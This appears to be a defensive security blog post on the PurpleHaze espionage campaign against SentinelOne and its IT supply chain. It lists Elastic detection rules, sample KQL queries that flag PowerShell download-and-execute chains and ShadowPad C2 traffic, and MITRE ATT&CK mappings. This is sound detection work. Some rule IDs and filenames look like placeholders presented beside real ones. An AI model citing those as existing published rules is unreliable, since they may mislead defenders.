China-Backed “PurpleHaze” Attacks on SentinelOne and the IT Supply Chain

Introduction

In early June 2025, DarkReading and SentinelLabs revealed that China-backed APT groups—specifically APT15 and UNC5174—targeted SentinelOne and its IT logistics partners in a cyber-espionage campaign dubbed PurpleHaze. The attackers performed broad reconnaissance and attempted supply chain intrusions using ShadowPad malware across more than 70 global organizations. Elastic Security can help identify and mitigate these behaviors with aligned detection rules and threat intelligence.

What Is the PurpleHaze Attack — and Why It Matters?

PurpleHaze refers to a coordinated activity stream rooted in China-aligned APT15 and UNC5174. Tactics include:

• October 2024: Remote reconnaissance of SentinelOne’s internet-facing infrastructure.
• Early 2025: Supply chain compromise attempt utilizing ShadowPad through a third-party hardware logistics provider.
• Broader campaign against 70+ sectors—including government, media, manufacturing—ongoing from July 2024 to March 2025.

SentinelLabs confirmed no compromise occurred at SentinelOne but acknowledged the persistent threat posture and strategic targeting of cybersecurity vendors.

Core Elastic Detection Rules

Elastic Security offers both prebuilt and custom rules that help detect key phases of the PurpleHaze campaign—such as reconnaissance, credential abuse, and malware deployment. Below are the most relevant detection rules aligned to this threat:

1. Potential Network Sweep Detected

• Rule ID: 781f8746-2180-4691-890c-4c96d11ca91d
• Filename: discovery_potential_network_sweep_detected.toml
• Description: Flags when a single source attempts connections to multiple internal hosts or ports, often indicative of scanning and enumeration behavior.
• Link: Potential Network Sweep Detected

2. Potential SYN-Based Port Scan Detected

• Rule ID: bbaa96b9-f36c-4898-ace2-581acb00a409
• Filename: discovery_potential_syn_port_scan_detected.toml
• Description: Detects port scanning via SYN packets, which may precede exploit attempts or service discovery across your perimeter.
• Link: Potential SYN-Based Port Scan Detected

3. Suspicious Vendor or Partner Account Anomaly

• Rule ID: vendor_access_behavior_anomaly
• Filename: detection_vendor_behavior_deviation.toml
• Description: Flags anomalies such as unusual login times, geolocations, or access patterns for known third-party/vendor accounts—relevant to detecting supply chain pivot attempts.
• Example KQL:

event.dataset : "o365.audit" AND
user.name : ("vendor1@yourdomain.com", "logistics-partner@yourdomain.com") AND
source.ip : * AND
NOT source.ip : ("known.trusted.ip.1", "known.trusted.ip.2")

• Suggested Action: Correlate with known IP ranges for vendors and alert on deviations. Consider enriching with geo-IP and login time analysis.
• Link: Create a Custom Rule – Elastic Security Guide

4. ShadowPad Execution and C2 Callback

• Rule ID: shadowpad_initial_execution_c2
• Filename: detection_shadowpad_c2_traffic_and_execution.toml
• Description: Detects suspicious DLL sideloading, ShadowPad payload execution, or outbound connections to known C2 infrastructure.
• Link: Search Elastic’s Detection Rules GitHub

5. PowerShell-Based Malware Delivery

• Rule ID: 7d3cfcd7-d4b1-41dc-a7e3-fad60ef52e87
• Filename: execution_potential_powershell_hacktool_script_by_author.toml
• Description: Detects PowerShell scripts that use Invoke-WebRequest, download-and-execute payloads, or leverage encoded commands—common in early-stage malware delivery.
• Link: View Rule

How to Create Custom Rules

• Correlate patterns in network reconnaissance across environments (e.g., repeated port 443 probes to external-facing endpoints).
• Flag anomalous use of third-party credentials accessing internal APIs or asset platforms.
• Watch for PowerShell-based download-and-execute chains pointing to ShadowPad’s staging domains.

Example KQL Query

process.name : "powershell.exe" AND
process.args : "*Invoke-WebRequest*ShadowPad*" AND
network.direction : "outbound"

Response and Hardening Tips

• Segment and monitor third-party access zones, especially for logistics or hardware environments.
• Proactively hunt on PowerShell execution chains linked to ShadowPad or reconnaissance payloads.
• Validate no unexpected exposures exist on internet-facing assets.
• Engage with vendors on supply-chain hardening—enforce MFA, just-in-time access, and cert-bound API hygiene.

MITRE ATT&CK Framework Mapping

• T1595: Active Scanning, combined with network reconnaissance.
• T1195.002: Supply Chain Compromise – Third-party services.
• T1105: Ingress Tool Transfer – deploying ShadowPad.
• T1059.001: PowerShell execution during exploit stages.

Why Should We Care?

The PurpleHaze campaign highlights that cybersecurity vendors—and their broader ecosystem—are now strategic targets.

• China‑backed APT15 and UNC5174 employ reconnaissance and supply chain abuse to position for espionage.
• Compromising vendors or logistics providers offers adversaries visibility into defense architectures and potential pivot points.
• Tools like ShadowPad and ORB network implants are persistent threats even when ultimate entry is blocked.

Bottom line: Elastic-based detection of reconnaissance, third-party access misuse, and post-compromise scripts should be a top priority in your security telemetry—especially in an era where even defenders can become primary targets.